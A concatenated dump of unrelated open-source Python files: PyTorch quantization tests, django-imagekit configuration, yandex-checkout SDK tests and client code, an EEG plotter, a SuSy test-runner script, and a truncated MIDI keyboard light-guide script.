model_prepared = prepare_by_platform(model_to_quantize, BackendType.Tensorrt, prepare_custom_config_dict)
enable_calibration(model_prepared)
model_prepared(dummy_input)
enable_quantization(model_prepared)
loss = model_prepared(dummy_input).sum()
loss.backward()
def test_minmax_observer(self):
model_to_quantize = torch.hub.load('pytorch/vision', 'resnet18', pretrained=False)
dummy_input = torch.randn(2, 3, 224, 224, device='cpu')
model_to_quantize.train()
extra_qconfig_dict = {
'w_observer': 'MinMaxObserver',
'a_observer': 'MinMaxObserver',
'w_fakequantize': 'FixedFakeQuantize',
'a_fakequantize': 'FixedFakeQuantize',
}
prepare_custom_config_dict = {'extra_qconfig_dict': extra_qconfig_dict}
model_prepared = prepare_by_platform(model_to_quantize, BackendType.Tensorrt, prepare_custom_config_dict)
enable_calibration(model_prepared)
model_prepared(dummy_input)
enable_quantization(model_prepared)
loss = model_prepared(dummy_input).sum()
loss.backward()
def test_lsq_observer(self):
model_to_quantize = torch.hub.load('pytorch/vision', 'resnet18', pretrained=False)
dummy_input = torch.randn(2, 3, 224, 224, device='cpu')
model_to_quantize.train()
extra_qconfig_dict = {
'w_observer': 'LSQObserver',
'a_observer': 'LSQObserver',
'w_fakequantize': 'FixedFakeQuantize',
'a_fakequantize': 'FixedFakeQuantize',
}
prepare_custom_config_dict = {'extra_qconfig_dict': extra_qconfig_dict}
model_prepared = prepare_by_platform(model_to_quantize, BackendType.Tensorrt, prepare_custom_config_dict)
enable_calibration(model_prepared)
model_prepared(dummy_input)
enable_quantization(model_prepared)
loss = model_prepared(dummy_input).sum()
loss.backward()
def test_clip_std_observer(self):
model_to_quantize = torch.hub.load('pytorch/vision', 'resnet18', pretrained=False)
dummy_input = torch.randn(2, 3, 224, 224, device='cpu')
model_to_quantize.train()
extra_qconfig_dict = {
'w_observer': 'ClipStdObserver',
'a_observer': 'ClipStdObserver',
'w_fakequantize': 'FixedFakeQuantize',
'a_fakequantize': 'FixedFakeQuantize',
}
prepare_custom_config_dict = {'extra_qconfig_dict': extra_qconfig_dict}
model_prepared = prepare_by_platform(model_to_quantize, BackendType.Tensorrt, prepare_custom_config_dict)
enable_calibration(model_prepared)
model_prepared(dummy_input)
enable_quantization(model_prepared)
loss = model_prepared(dummy_input).sum()
loss.backward()
``` |
{
"source": "a1tus/django-imagekit",
"score": 2
} |
#### File: django-imagekit/imagekit/conf.py
```python
from appconf import AppConf
from django.conf import settings
class ImageKitConf(AppConf):
CACHEFILE_NAMER = 'imagekit.cachefiles.namers.hash'
SPEC_CACHEFILE_NAMER = 'imagekit.cachefiles.namers.source_name_as_path'
CACHEFILE_DIR = 'CACHE/images'
DEFAULT_CACHEFILE_BACKEND = 'imagekit.cachefiles.backends.Simple'
DEFAULT_CACHEFILE_STRATEGY = 'imagekit.cachefiles.strategies.JustInTime'
DEFAULT_FILE_STORAGE = None
CACHE_BACKEND = None
CACHE_PREFIX = 'imagekit:'
USE_MEMCACHED_SAFE_CACHE_KEY = True
def configure_cache_backend(self, value):
if value is None:
try:
from django.core.cache.backends.dummy import DummyCache
except ImportError:
dummy_cache = 'dummy://'
else:
dummy_cache = 'django.core.cache.backends.dummy.DummyCache'
# DEFAULT_CACHE_ALIAS doesn't exist in Django<=1.2
try:
from django.core.cache import DEFAULT_CACHE_ALIAS as default_cache_alias
except ImportError:
default_cache_alias = 'default'
if settings.DEBUG:
value = dummy_cache
elif default_cache_alias in getattr(settings, 'CACHES', {}):
value = default_cache_alias
else:
value = getattr(settings, 'CACHE_BACKEND', None) or dummy_cache
return value
def configure_default_file_storage(self, value):
if value is None:
value = settings.DEFAULT_FILE_STORAGE
return value
```
#### File: django-imagekit/imagekit/importers.py
```python
import re
import sys
class ProcessorImporter(object):
"""
The processors were moved to the PILKit project so they could be used
separtely from ImageKit (which has a bunch of Django dependencies). However,
there's no real need to expose this fact (and we want to maintain backwards
compatibility), so we proxy all "imagekit.processors" imports to
"pilkit.processors" using this object.
"""
pattern = re.compile(r'^imagekit\.processors((\..*)?)$')
def find_module(self, name, path=None):
if self.pattern.match(name):
return self
def load_module(self, name):
if name in sys.modules:
return sys.modules[name]
from django.utils.importlib import import_module
new_name = self.pattern.sub(r'pilkit.processors\1', name)
mod = import_module(new_name)
sys.modules[name] = mod
return mod
sys.meta_path.insert(0, ProcessorImporter())
``` |
{
"source": "a1tus/yandex-checkout-sdk-python",
"score": 3
} |
#### File: test/unit/test_receipt_request.py
```python
import unittest
from yandex_checkout import Amount
from yandex_checkout.domain.common.receipt_type import ReceiptType
from yandex_checkout.domain.models.currency import Currency
from yandex_checkout.domain.models.receipt_customer import ReceiptCustomer
from yandex_checkout.domain.models.receipt_item_supplier import ReceiptItemSupplier
from yandex_checkout.domain.models.settlement import SettlementType, Settlement
from yandex_checkout.domain.request.receipt_item_request import ReceiptItemRequest
from yandex_checkout.domain.request.receipt_request import ReceiptRequest
class TestReceiptRequest(unittest.TestCase):
def test_request_cast(self):
request = ReceiptRequest()
request.type = ReceiptType.PAYMENT
request.send = True
request.customer = ReceiptCustomer({'phone': '79990000000', 'email': '<EMAIL>'})
request.items = [
ReceiptItemRequest({
"description": "Product 1",
"quantity": 2.0,
"amount": {
"value": 250.0,
"currency": Currency.RUB
},
"vat_code": 2
}),
ReceiptItemRequest({
"description": "Product 2",
"quantity": 1.0,
"amount": {
"value": 100.0,
"currency": Currency.RUB
},
"vat_code": 2
})
]
request.settlements = [
Settlement({
'type': SettlementType.CASHLESS,
'amount': {
'value': 250.0,
'currency': Currency.RUB
}
})
]
request.tax_system_code = 1
request.payment_id = '215d8da0-000f-50be-b000-0003308c89be'
self.assertEqual({
'type': ReceiptType.PAYMENT,
'send': True,
'customer': {'email': '<EMAIL>', 'phone': '79990000000'},
'email': '<EMAIL>',
'phone': '79990000000',
'items': [
{
'description': 'Product 1',
'quantity': 2.0,
'amount': {
'value': 250.0,
'currency': Currency.RUB
},
'vat_code': 2
},
{
'description': 'Product 2',
'quantity': 1.0,
'amount': {
'value': 100.0,
'currency': Currency.RUB
},
'vat_code': 2
}
],
'settlements': [
{
'type': SettlementType.CASHLESS,
'amount': {
'value': 250.0,
'currency': Currency.RUB
}
}
],
'tax_system_code': 1,
'payment_id': '215d8da0-000f-50be-b000-0003308c89be'
}, dict(request))
def test_request_setters(self):
request = ReceiptRequest({
'type': ReceiptType.PAYMENT,
'send': True,
'email': '<EMAIL>',
'phone': '79990000000',
'items': [
{
'description': 'Product 1',
'quantity': 2.0,
'amount': Amount({
'value': 250.0,
'currency': Currency.RUB
}),
'vat_code': 2,
'payment_mode': 'full_payment',
'payment_subject': 'commodity',
'country_of_origin_code': 'CN',
'product_code': '00 00 00 01 00 21 FA 41 00 23 05 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 AB 00',
'customs_declaration_number': '10714040/140917/0090376',
'excise': '20.00',
'supplier': {
'name': 'string',
'phone': 'string',
'inn': 'string'
}
},
{
'description': 'Product 2',
'quantity': 1.0,
'amount': {
'value': 100.0,
'currency': Currency.RUB
},
'vat_code': 2,
'supplier': ReceiptItemSupplier({
'name': 'string',
'phone': 'string',
'inn': 'string'
})
}
],
'settlements': [
{
'type': SettlementType.CASHLESS,
'amount': {
'value': 250.0,
'currency': Currency.RUB
}
}
],
'tax_system_code': 1,
'payment_id': '215d8da0-000f-50be-b000-0003308c89be',
'on_behalf_of': 'string'
})
self.assertIsInstance(request.customer, ReceiptCustomer)
self.assertIsInstance(request.items, list)
self.assertIsInstance(request.settlements, list)
with self.assertRaises(TypeError):
request.items[0].supplier = 'invalid supplier'
with self.assertRaises(TypeError):
request.items[0].amount = 'invalid amount'
with self.assertRaises(TypeError):
request.customer = 'invalid customer'
with self.assertRaises(TypeError):
request.items = 'invalid items'
with self.assertRaises(TypeError):
request.items = ['invalid item']
with self.assertRaises(TypeError):
request.settlements = 'invalid settlements'
with self.assertRaises(TypeError):
request.settlements = ['invalid settlement']
with self.assertRaises(TypeError):
request.send = 'invalid send'
with self.assertRaises(TypeError):
request.tax_system_code = 'invalid tax_system_code'
def test_request_validate(self):
request = ReceiptRequest()
with self.assertRaises(ValueError):
request.validate()
request.type = ReceiptType.PAYMENT
with self.assertRaises(ValueError):
request.validate()
request.send = True
with self.assertRaises(ValueError):
request.validate()
request.customer = ReceiptCustomer({'phone': '79990000000', 'email': '<EMAIL>'})
with self.assertRaises(ValueError):
request.validate()
request.items = [
ReceiptItemRequest({
"description": "Product 1",
"quantity": 2.0,
"amount": {
"value": 250.0,
"currency": Currency.RUB
},
"vat_code": 2
}),
ReceiptItemRequest({
"description": "Product 2",
"quantity": 1.0,
"amount": {
"value": 100.0,
"currency": Currency.RUB
},
"vat_code": 2
})
]
with self.assertRaises(ValueError):
request.validate()
request.settlements = [
Settlement({
'type': SettlementType.CASHLESS,
'amount': {
'value': 250.0,
'currency': Currency.RUB
}
})
]
with self.assertRaises(ValueError):
request.validate()
request.tax_system_code = 1
with self.assertRaises(ValueError):
request.validate()
request.refund_id = '215d8da0-000f-50be-b000-0003308c89be'
with self.assertRaises(ValueError):
request.validate()
request.type = ReceiptType.REFUND
request.payment_id = '215d8da0-000f-50be-b000-0003308c89be'
with self.assertRaises(ValueError):
request.validate()
request.items = None
request.settlements = None
with self.assertRaises(ValueError):
request.validate()
```
#### File: yandex-checkout-sdk-python/yandex_checkout/client.py
```python
import requests
from requests.adapters import HTTPAdapter
from requests.auth import _basic_auth_str
from urllib3 import Retry
from yandex_checkout import Configuration
from yandex_checkout.domain.common.request_object import RequestObject
from yandex_checkout.domain.common.user_agent import UserAgent
from yandex_checkout.domain.exceptions.api_error import ApiError
from yandex_checkout.domain.exceptions.bad_request_error import BadRequestError
from yandex_checkout.domain.exceptions.forbidden_error import ForbiddenError
from yandex_checkout.domain.exceptions.not_found_error import NotFoundError
from yandex_checkout.domain.exceptions.response_processing_error import ResponseProcessingError
from yandex_checkout.domain.exceptions.too_many_request_error import TooManyRequestsError
from yandex_checkout.domain.exceptions.unauthorized_error import UnauthorizedError
class ApiClient:
endpoint = Configuration.api_endpoint()
def __init__(self):
self.configuration = Configuration.instantiate()
self.shop_id = self.configuration.account_id
self.shop_password = self.configuration.secret_key
self.auth_token = self.configuration.auth_token
self.timeout = self.configuration.timeout
self.max_attempts = self.configuration.max_attempts
self.user_agent = UserAgent()
if self.configuration.agent_framework:
self.user_agent.framework = self.configuration.agent_framework
if self.configuration.agent_cms:
self.user_agent.cms = self.configuration.agent_cms
if self.configuration.agent_module:
self.user_agent.module = self.configuration.agent_module
def request(self, method="", path="", query_params=None, headers=None, body=None):
if isinstance(body, RequestObject):
body.validate()
body = dict(body)
request_headers = self.prepare_request_headers(headers)
raw_response = self.execute(body, method, path, query_params, request_headers)
if raw_response.status_code != 200:
self.__handle_error(raw_response)
return raw_response.json()
def execute(self, body, method, path, query_params, request_headers):
session = self.get_session()
raw_response = session.request(method,
self.endpoint + path,
params=query_params,
headers=request_headers,
json=body)
return raw_response
def get_session(self):
session = requests.Session()
retries = Retry(total=self.max_attempts,
backoff_factor=self.timeout / 1000,
method_whitelist=['POST'],
status_forcelist=[202])
session.mount('https://', HTTPAdapter(max_retries=retries))
return session
def prepare_request_headers(self, headers):
request_headers = {'Content-type': 'application/json'}
if self.auth_token is not None:
auth_headers = {"Authorization": "Bearer " + self.auth_token}
else:
auth_headers = {"Authorization": _basic_auth_str(self.shop_id, self.shop_password)}
request_headers.update(auth_headers)
request_headers.update({"YM-User-Agent": self.user_agent.get_header_string()})
if isinstance(headers, dict):
request_headers.update(headers)
return request_headers
def __handle_error(self, raw_response):
http_code = raw_response.status_code
if http_code == BadRequestError.HTTP_CODE:
raise BadRequestError(raw_response.json())
elif http_code == ForbiddenError.HTTP_CODE:
raise ForbiddenError(raw_response.json())
elif http_code == NotFoundError.HTTP_CODE:
raise NotFoundError(raw_response.json())
elif http_code == TooManyRequestsError.HTTP_CODE:
raise TooManyRequestsError(raw_response.json())
elif http_code == UnauthorizedError.HTTP_CODE:
raise UnauthorizedError(raw_response.json())
elif http_code == ResponseProcessingError.HTTP_CODE:
raise ResponseProcessingError(raw_response.json())
else:
raise ApiError(raw_response.text)
```
#### File: domain/request/receipt_item_request.py
```python
from decimal import Decimal
from yandex_checkout.domain.common.base_object import BaseObject
from yandex_checkout.domain.models.amount import Amount
from yandex_checkout.domain.models.receipt_item_supplier import ReceiptItemSupplier
class ReceiptItemRequest(BaseObject):
"""
Class representing receipt item data wrapper object
Used in Receipt
"""
__description = None
__quantity = None
__amount = None
__vat_code = None
__payment_mode = None
__payment_subject = None
__product_code = None
__country_of_origin_code = None
__customs_declaration_number = None
__excise = None
__supplier = None
__agent_type = None
@property
def description(self):
return self.__description
@description.setter
def description(self, value):
self.__description = str(value)
@property
def quantity(self):
"""
:return Decimal:
"""
return self.__quantity
@quantity.setter
def quantity(self, value):
self.__quantity = Decimal(float(value))
@property
def amount(self):
return self.__amount
@amount.setter
def amount(self, value):
if isinstance(value, dict):
self.__amount = Amount(value)
elif isinstance(value, Amount):
self.__amount = value
else:
raise TypeError('Invalid amount value type')
@property
def vat_code(self):
return self.__vat_code
@vat_code.setter
def vat_code(self, value):
self.__vat_code = int(value)
@property
def payment_mode(self):
return self.__payment_mode
@payment_mode.setter
def payment_mode(self, value):
self.__payment_mode = str(value)
@property
def payment_subject(self):
return self.__payment_subject
@payment_subject.setter
def payment_subject(self, value):
self.__payment_subject = str(value)
@property
def product_code(self):
return self.__product_code
@product_code.setter
def product_code(self, value):
self.__product_code = str(value)
@property
def country_of_origin_code(self):
return self.__country_of_origin_code
@country_of_origin_code.setter
def country_of_origin_code(self, value):
self.__country_of_origin_code = str(value)
@property
def customs_declaration_number(self):
return self.__customs_declaration_number
@customs_declaration_number.setter
def customs_declaration_number(self, value):
self.__customs_declaration_number = str(value)
@property
def excise(self):
"""
:return Decimal:
"""
return self.__excise
@excise.setter
def excise(self, value):
self.__excise = Decimal(float(value))
@property
def supplier(self):
return self.__supplier
@supplier.setter
def supplier(self, value):
if isinstance(value, dict):
self.__supplier = ReceiptItemSupplier(value)
elif isinstance(value, ReceiptItemSupplier):
self.__supplier = value
else:
raise TypeError('Invalid supplier value type')
@property
def agent_type(self):
return self.__agent_type
@agent_type.setter
def agent_type(self, value):
self.__agent_type = str(value)
```
#### File: domain/request/refund_request.py
```python
from yandex_checkout.domain.common.request_object import RequestObject
from yandex_checkout.domain.models.amount import Amount
from yandex_checkout.domain.models.receipt import Receipt
from yandex_checkout.domain.models.refund_source import RefundSource
class RefundRequest(RequestObject):
__payment_id = None
__amount = None
__description = None
__receipt = None
__sources = None
@property
def payment_id(self):
return self.__payment_id
@payment_id.setter
def payment_id(self, value):
cast_value = str(value)
if len(cast_value) == 36:
self.__payment_id = cast_value
else:
raise ValueError('Invalid payment id value')
@property
def amount(self):
return self.__amount
@amount.setter
def amount(self, value):
if isinstance(value, dict):
self.__amount = Amount(value)
elif isinstance(value, Amount):
self.__amount = value
else:
raise TypeError('Invalid amount value type')
@property
def description(self):
return self.__description
@description.setter
def description(self, value):
cast_value = str(value)
if cast_value and len(cast_value) < 256:
self.__description = cast_value
else:
raise ValueError('Invalid commend value')
@property
def sources(self):
return self.__sources
@sources.setter
def sources(self, value):
if isinstance(value, list):
items = []
for item in value:
if isinstance(item, dict):
items.append(RefundSource(item))
elif isinstance(item, RefundSource):
items.append(item)
else:
raise TypeError('Invalid sources type in refund.sources')
self.__sources = items
else:
raise TypeError('Invalid sources value type in refund_request')
@property
def receipt(self):
return self.__receipt
@receipt.setter
def receipt(self, value):
if isinstance(value, dict):
self.__receipt = Receipt(value)
elif isinstance(value, Receipt):
self.__receipt = value
else:
raise TypeError('Invalid receipt value type')
def validate(self):
if not self.payment_id:
self.__set_validation_error('Payment id not specified')
if not self.amount:
self.__set_validation_error('Amount not specified')
if self.amount.value <= 0.0:
self.__set_validation_error('Invalid amount value: ' + str(self.amount.value))
if self.receipt and self.receipt.has_items():
email = self.receipt.email
phone = self.receipt.phone
if not email and not phone:
self.__set_validation_error('Both email and phone values are empty in receipt')
if not self.receipt.tax_system_code and any(not item.vat_code for item in self.receipt.items):
self.__set_validation_error('Item vat_id and receipt tax_system_id not specified')
def __set_validation_error(self, message):
raise ValueError(message)
```
#### File: yandex-checkout-sdk-python/yandex_checkout/refund.py
```python
import uuid
from yandex_checkout.client import ApiClient
from yandex_checkout.domain.common.http_verb import HttpVerb
from yandex_checkout.domain.request.refund_request import RefundRequest
from yandex_checkout.domain.response.refund_list_response import RefundListResponse
from yandex_checkout.domain.response.refund_response import RefundResponse
class Refund:
base_path = '/refunds'
def __init__(self):
self.client = ApiClient()
@classmethod
def create(cls, params, idempotency_key=None):
"""
Create refund
:param params: data passed to API
:param idempotency_key:
:return:
"""
instance = cls()
path = cls.base_path
if not idempotency_key:
idempotency_key = <KEY>()
headers = {
'Idempotence-Key': str(idempotency_key)
}
if isinstance(params, dict):
params_object = RefundRequest(params)
elif isinstance(params, RefundRequest):
params_object = params
else:
raise TypeError('Invalid params value type')
response = instance.client.request(HttpVerb.POST, path, None, headers, params_object)
return RefundResponse(response)
@classmethod
def find_one(cls, refund_id):
"""
Get refund information
:param refund_id:
:return: RefundResponse
"""
instance = cls()
if not isinstance(refund_id, str) or not refund_id:
raise ValueError('Invalid payment_id value')
path = instance.base_path + '/' + refund_id
response = instance.client.request(HttpVerb.GET, path)
return RefundResponse(response)
@classmethod
def list(cls, params):
instance = cls()
path = cls.base_path
response = instance.client.request(HttpVerb.GET, path, params)
return RefundListResponse(response)
``` |
{
"source": "a1varo-costa/EEGPlotter",
"score": 3
} |
#### File: EEGPlotter/app/plotter.py
```python
from .processing import filters, average
from PyQt5 import QtCore, QtGui, QtWidgets
from pyqtgraph import mkPen
import numpy as np
class Plotter(object):
def __init__(self, ui, stream, f):
super().__init__()
self.ui = ui
self.stream = stream
self.pltFilter = self.ui.plotWidget.addPlot(row=0, col=0)
self.pltFFT = self.ui.plotWidget.addPlot(row=1, col=0)
self.curveFilter = self.pltFilter.plot()
self.curveAverage = self.pltFilter.plot()
self.curveFFT = self.pltFFT.plot()
if self.stream is not None:
self.avrg = average.Averager(self.stream.buf_max_size, 5)
self._penAvrg = mkPen('r') # red pen
self.doFilter = False
self.ui.cutoffLowSpinBox.setEnabled(False)
self.ui.cutoffHighSpinBox.setEnabled(False)
self.lowCutoff = f/2 - 0.01
self.highCutoff = 0.000001
self.samplingFreq = f
self._connectSlots()
self._start()
def _start(self):
if self.stream is not None:
self.timer = QtCore.QTimer()
self.timer.timeout.connect(self._update)
self.stream.open()
self.timer.start(0)
print('>> Plotting...\n')
def _update(self):
filtered = filters.butterworth(self.stream.buf,
self.samplingFreq,
(self.lowCutoff, self.highCutoff),
2,
fopt='bandpass')
x, y = filters.fftUtil(np.arange(self.stream.buf_max_size),
filtered,
1/self.samplingFreq)
self.curveFilter.setData(filtered)
self.curveAverage.setData(self.avrg.calc(filtered), pen=self._penAvrg)
y[0] = 0; # remove 0Hz bin
self.curveFFT.setData(x, y)
def _onCheckBoxStateChanged(self, state):
if state == QtCore.Qt.Checked:
self.doFilter = True
self.ui.cutoffLowSpinBox.setValue(self.lowCutoff)
self.ui.cutoffLowSpinBox.setEnabled(True)
self.ui.cutoffHighSpinBox.setValue(self.highCutoff)
self.ui.cutoffHighSpinBox.setEnabled(True)
else:
self.doFilter = False
self.ui.cutoffLowSpinBox.setEnabled(False)
self.ui.cutoffHighSpinBox.setEnabled(False)
def _onLowSpinBoxValueChanged(self, d):
self.lowCutoff = d
def _onHighSpinBoxValueChanged(self, d):
self.highCutoff = d
def _connectSlots(self):
self.ui.filterCheckBox.\
stateChanged.connect(self._onCheckBoxStateChanged)
self.ui.cutoffLowSpinBox.\
valueChanged.connect(self._onLowSpinBoxValueChanged)
self.ui.cutoffHighSpinBox.\
valueChanged.connect(self._onHighSpinBoxValueChanged)
```
#### File: app/processing/average.py
```python
from collections import deque
import numpy as np
class Averager(object):
def __init__(self, sz, numSamples):
self.numSamples = numSamples if numSamples >= 2 else 2
zeros = np.zeros(sz, dtype='float64')
self.__sigs = deque(self.numSamples * [zeros], self.numSamples)
self.__sum = zeros
def calc(self, newsig):
if not self._isndarray(newsig):
newsig = np.array(newsig, dtype='float64')
self.__sum += newsig
self.__sigs.append(newsig)
self.__sum -= self.__sigs[0];
av = self.__sum / self.numSamples
return av
def _isndarray(self, arr):
return isinstance(arr, np.ndarray)
```
#### File: app/uigen/mainWindowUI.py
```python
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(740, 626)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.gridLayout = QtWidgets.QGridLayout(self.centralwidget)
self.gridLayout.setObjectName("gridLayout")
self.groupBox = QtWidgets.QGroupBox(self.centralwidget)
self.groupBox.setObjectName("groupBox")
self.verticalLayout = QtWidgets.QVBoxLayout(self.groupBox)
self.verticalLayout.setObjectName("verticalLayout")
self.plotGroupWidget = QtWidgets.QWidget(self.groupBox)
self.plotGroupWidget.setObjectName("plotGroupWidget")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.plotGroupWidget)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.filterHLayout = QtWidgets.QHBoxLayout()
self.filterHLayout.setObjectName("filterHLayout")
self.cutoffLowLabel = QtWidgets.QLabel(self.plotGroupWidget)
self.cutoffLowLabel.setObjectName("cutoffLowLabel")
self.filterHLayout.addWidget(self.cutoffLowLabel)
self.cutoffLowSpinBox = QtWidgets.QDoubleSpinBox(self.plotGroupWidget)
self.cutoffLowSpinBox.setMaximum(99999.99)
self.cutoffLowSpinBox.setObjectName("cutoffLowSpinBox")
self.filterHLayout.addWidget(self.cutoffLowSpinBox)
self.cutoffHighLabel = QtWidgets.QLabel(self.plotGroupWidget)
self.cutoffHighLabel.setObjectName("cutoffHighLabel")
self.filterHLayout.addWidget(self.cutoffHighLabel)
self.cutoffHighSpinBox = QtWidgets.QDoubleSpinBox(self.plotGroupWidget)
self.cutoffHighSpinBox.setEnabled(True)
self.cutoffHighSpinBox.setMaximum(99999.99)
self.cutoffHighSpinBox.setObjectName("cutoffHighSpinBox")
self.filterHLayout.addWidget(self.cutoffHighSpinBox)
self.filterCheckBox = QtWidgets.QCheckBox(self.plotGroupWidget)
self.filterCheckBox.setObjectName("filterCheckBox")
self.filterHLayout.addWidget(self.filterCheckBox)
spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.filterHLayout.addItem(spacerItem)
self.verticalLayout_2.addLayout(self.filterHLayout)
self.plotWidget = GraphicsLayoutWidget(self.plotGroupWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.plotWidget.sizePolicy().hasHeightForWidth())
self.plotWidget.setSizePolicy(sizePolicy)
self.plotWidget.setMinimumSize(QtCore.QSize(200, 200))
self.plotWidget.setObjectName("plotWidget")
self.verticalLayout_2.addWidget(self.plotWidget)
self.verticalLayout.addWidget(self.plotGroupWidget)
self.gridLayout.addWidget(self.groupBox, 0, 0, 1, 1)
MainWindow.setCentralWidget(self.centralwidget)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
self.groupBox.setTitle(_translate("MainWindow", "PLOT"))
self.cutoffLowLabel.setText(_translate("MainWindow", "Low Cut-Off"))
self.cutoffHighLabel.setText(_translate("MainWindow", "High Cut-Off"))
self.filterCheckBox.setText(_translate("MainWindow", "FILTER"))
from pyqtgraph import GraphicsLayoutWidget
``` |
{
"source": "a1varo-costa/susytest",
"score": 3
} |
#### File: a1varo-costa/susytest/susytest.py
```python
from urllib.request import urlopen
import subprocess
import difflib
import pprint
import click
import ssl
import sys
import re
class SusyURLValidator(click.ParamType):
"""Validate URL given as command line argument"""
regex = r'(https\:\/\/susy\.ic\.unicamp\.br\:9999\/)(\w+)\/(\w+)$'
example = 'https://susy.ic.unicamp.br:9999/<COURSE>/<EXERCISE>'
name = 'url'
def convert(self, value, param, ctx):
match = re.match(self.regex, value)
if not match:
self.fail(
f'"{value}".\n > Expected pattern: "{self.example}"',
param,
ctx
)
value = {
'url': match.group(0),
'netloc': match.group(1),
'course': match.group(2),
'exercise': match.group(3)
}
return value
class TestsNotFoundError(Exception):
"""No test cases files found on web page"""
pass
def match_files(html):
"""Extract test file names from HTML source"""
try:
end = re.search(r'Testes fechados', html).end()
matches = re.findall(r'"(arq\d.\w+)"', html[ : end])
except AttributeError:
raise TestsNotFoundError
if len(matches) < 2:
raise TestsNotFoundError
files = [tuple(matches[i:i+2]) for i in range(0, len(matches), 2)]
return files
def download_tests(url):
"""Download test cases files (input/solution)"""
def _download(url):
with urlopen(url, context=ssl.SSLContext(ssl.PROTOCOL_TLS)) as response:
return response.read().decode()
html = _download(url + '/dados/testes.html')
files = match_files(html)
tests = []
for i, val in enumerate(files):
_in, _sol = val
t = {
'id': i,
'in': _download(url + '/dados/' + _in).splitlines(keepends=True),
'sol': _download(url + '/dados/' + _sol).splitlines(keepends=True)
}
tests.append(t)
return tests
def run(cmd, _in):
"""Run `cmd` passing `_in` to stdin"""
proc = subprocess.run(
args = cmd,
input = ''.join(_in),
encoding = 'utf-8',
capture_output = True,
check = True,
timeout = 1.5 # seconds
)
return proc
def pretty_diff_ans(a, b):
"""Compare `a` and `b` returning a list of ANSI styled string
and a boolean indicating if `a` and `b` are equal"""
d = difflib.ndiff(a, b)
ret = []
equal = True
for s in d:
if s.startswith('- '):
ret.append(click.style(s, fg='red'))
elif s.startswith('? '):
equal = False
ret.append(click.style(s, fg='cyan'))
else:
ret.append(click.style(s, fg='green'))
return ret, equal
@click.command()
@click.option('-n', '--nodiff', is_flag=True, help='Disable output diff.')
@click.option('-v', '--verbose', is_flag=True, help='Enable verbose output.')
@click.version_option()
@click.argument('url', type=SusyURLValidator())
@click.argument('prog', type=click.Path(exists=True, dir_okay=False))
def cli(url, prog, nodiff, verbose):
"""A script to automate the testing of programs to be
submitted to Unicamp's SuSy platform."""
pp = pprint.PrettyPrinter(indent=4, width=79)
if verbose:
click.echo(f"URL:\t\t\"{url['url']}\"")
click.echo(f"Prog:\t\t\"{prog}\"")
try:
tests = download_tests(url['url'])
click.echo(f'Test Cases:\t{len(tests)}\n')
except TestsNotFoundError:
click.echo(f"> No test files found at \"{url['url']}\".")
sys.exit(1)
for test in tests:
try:
click.echo(click.style(f">> TEST {test['id']}", fg='yellow'))
result = run(prog, test['in'])
if verbose:
click.echo(
click.style('> Input:', bold=True) +
'\n' +
pp.pformat(test['in'])
)
click.echo(
'\n' +
click.style('> Output:', bold=True) +
'\n' +
pp.pformat(result.stdout.splitlines(keepends=True)) +
'\n'
)
diff, equal = pretty_diff_ans(
result.stdout.splitlines(keepends=True),
test['sol']
)
if nodiff:
msg = 'OK' if equal else 'Wrong Answer'
fg = 'green' if equal else 'red'
click.secho('> ' + msg, fg=fg)
continue
click.echo(
click.style('> Diff:', bold=True) +
'\n' +
''.join(diff)
)
except subprocess.TimeoutExpired as e:
click.echo(f'> Timeout of {e.timeout}s expired while waiting for program "{e.cmd}".')
except subprocess.CalledProcessError as e:
click.echo(f'> Program "{e.cmd}" returned non-zero exit status {e.returncode}.')
except Exception as e:
click.echo('> Unexpected error:\n')
click.echo(e)
sys.exit(1)
``` |
{
"source": "a1vv/KompleteKontrolLightGuide",
"score": 3
} |
#### File: a1vv/KompleteKontrolLightGuide/SynthesiaKontrol-MK1.py
```python
import hid
import mido
from msvcrt import getch
numkeys = 88 #change this to the number of keys on your keyboard
offset = -(108-numkeys+1)
pid = 0x1410 #change this to the product id of your keyboard
def init():
"""Connect to the keyboard, switch all lights off"""
global bufferC # Buffer with the full key/lights mapping
global device
device=hid.device()
# 0x17cc: Native Instruments. 0x1410: KK S88 MK1
device.open(0x17cc, pid)
device.write([0xa0])
bufferC = [0x00] * numkeys
notes_off()
return True
def notes_off():
"""Turn off lights for all notes"""
bufferC = [0x00] * numkeys
device.write([0x82] + bufferC)
def accept_notes(port):
"""Only let note_on and note_off messages through."""
for message in port:
if message.type in ('note_on', 'note_off'):
yield message
if message.type == 'control_change' and message.channel == 0 and message.control == 16:
if (message.value & 4):
print ("User is playing")
if (message.value & 1):
print ("Playing Right Hand")
if (message.value & 2):
print ("Playing Left Hand")
notes_off()
def LightNote(note, status, channel, velocity):
"""Light a note ON or OFF"""
key = (note + offset)
if key < 0 or key >= numkeys:
return
# Determine color
left = [0x00] + [0x00] + [0xFF] # Blue
left_thumb = [0x00] + [0x00] + [0x80] # Lighter Blue
right = [0x00] + [0xFF] + [0x00] # Green
right_thumb = [0x00] + [0x80] + [0x00] # Lighter Green
default = right
color = default
# Finger based channel protocol from Synthesia
# Reference: https://www.synthesiagame.com/forum/viewtopic.php?p=43585#p43585
if channel == 0:
# we don't know who or what this note belongs to, but light something up anyway
color = default
if channel >= 1 and channel <= 5:
# left hand fingers, thumb through pinky
if channel == 1:
color = left_thumb
else:
color = left
if channel >= 6 and channel <= 10:
# right hand fingers, thumb through pinky
if channel == 6:
color = right_thumb
else:
color = right
if channel == 11:
# left hand, unknown finger
color = left
if channel == 12:
# right hand, unknown finger
color = right
black = [0x00] * 3
if status == 'note_on' :
colors[3*key:3*key+3]=color #set the three colorvalues of the key to desired color
if status == 'note_off' :
